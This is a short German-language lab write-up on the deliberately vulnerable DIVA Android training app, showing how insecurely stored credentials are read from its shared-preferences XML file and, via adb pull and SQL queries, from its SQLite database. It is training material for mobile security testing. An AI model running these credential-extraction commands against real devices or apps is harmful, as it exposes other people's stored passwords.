4250 DIVA App: M2 Insecure Data Storage
Robin Suter
Part 1 - Shared Preferences
Shared preference file auslesen:
$ cd /data/data/jakhar.aseem.diva/shared_prefs
$ cat jakhar.aseem.diva_preferences.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?> <map> <string name="user">chief</string> <string name="password">mysecretpassword!!</string> </map>
Part 2 - SQLite
Das SQLite-File liegt unter /data/data/jakhar.aseem.diva/databases/ids2
$ adb pull /data/data/jakhar.aseem.diva/databases/ids2 /tmp/ids2 $ sqlite /tmp/ids2
- Tabelle herausfinden:
SELECT name FROM sqlite_master WHERE type='table';
android_metadata myuser
- User / Passwort rauslesen:
select * from myuser;
boss|mypass123